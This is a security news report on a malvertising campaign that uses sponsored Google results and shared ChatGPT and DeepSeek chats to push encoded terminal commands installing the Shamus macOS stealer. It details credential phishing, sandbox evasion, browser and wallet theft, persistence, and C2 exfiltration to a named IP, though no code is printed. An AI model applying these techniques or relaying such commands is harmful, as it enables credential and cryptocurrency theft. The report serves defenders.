A sophisticated malvertising campaign is exploiting ChatGPT and DeepSeek’s shared chat features to deliver credential-stealing malware to macOS users.
Threat actors are purchasing sponsored Google search results and redirecting victims to legitimate-looking LLM-generated chat sessions that contain obfuscated malicious commands, effectively bypassing platform-level safety mechanisms.
The attack begins when users search for common macOS troubleshooting queries, such as “how to clear storage on Mac.”
Sponsored Google search results direct victims to shared ChatGPT and DeepSeek chat links that appear benign but contain malicious terminal commands disguised as legitimate system maintenance instructions.
The commands are encoded in base64 to evade initial detection while maintaining plausible deniability.
Upon execution, the initial bash script performs several critical functions. It creates a password prompt loop that mimics legitimate macOS authentication, validates the entered password using dscl authentication checks, and stores the harvested credentials in /tmp/.pass.
The script then downloads the primary malware payload a native macOS binary designed to steal sensitive data and establish persistence.
Multi-Stage Malware: Shamus Stealer
Analysis reveals the downloaded payload is Shamus, a known info-stealer and cryptostealer malware that employs sophisticated obfuscation techniques to evade reverse engineering.
The shared chat includes instructions on how to run a terminal command in order to clean up your Mac’s memory.
The binary uses a multi-stage decoding process combining arithmetic operations with XOR encoding and a custom Base64-like decoder driven by a hash-table alphabet.
This approach prevents simple string extraction tools from revealing malware capabilities during static analysis.
Once executed, the malware performs environment checks to detect analysis sandboxes and virtualized environments.
If detection indicators are found such as QEMU, VMware, or specific hardware serial numbers the malware exits without executing its payload. The malware then hides the Terminal application to conceal ongoing malicious activity.
Each character is looked up through this table to get a 6-bit value. These 6-bit chunks are accumulated until there are at least 8 bits available, then one output byte is produced.
The malware’s primary payload is an 800-line AppleScript designed to extract sensitive data systematically.
It targets 12 different Chromium-based browsers (Chrome, Brave, Edge, Opera variants) and Firefox-based browsers, stealing cookies, browsing history, login credentials, and local storage data.
Cryptocurrency theft capabilities are particularly concerning. The malware specifically targets 200+ cryptocurrency wallet browser extensions, including MetaMask, and extracts entire extension directories and IndexedDB data.
For desktop wallets, it targets 15 different applications spanning Bitcoin Core, Electrum, Exodus, Ledger Live, and Trezor Suite.
The malware also harvests the complete macOS Keychain database, system information via system_profiler, Telegram session data, OpenVPN profiles, and files from Desktop, Documents, and Downloads folders with extensions including .wallet, .key, .json, and .db.
Persistence and Application
To maintain access, the malware installs a LaunchDaemon that runs as root, executing a persistence agent that runs the bot binary every second with user privileges.
This ensures the malware survives system reboots and automatic restart upon termination.
Most troublingly, the malware performs application trojanization, replacing legitimate cryptocurrency wallet applications particularly Ledger Live with compromised versions that intercept transactions and steal cryptocurrency even when users employ hardware wallets.
The C2 infrastructure communicates via HTTP POST requests to 45.94.47.205/contact, with stolen data packaged into ZIP archives and exfiltrated using curl with custom headers containing user identifiers and build IDs.
Organizations should educate users about the risks of clicking sponsored search results, implement endpoint detection and response solutions to identify malware execution patterns, and monitor for suspicious macOS LaunchDaemon installations.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.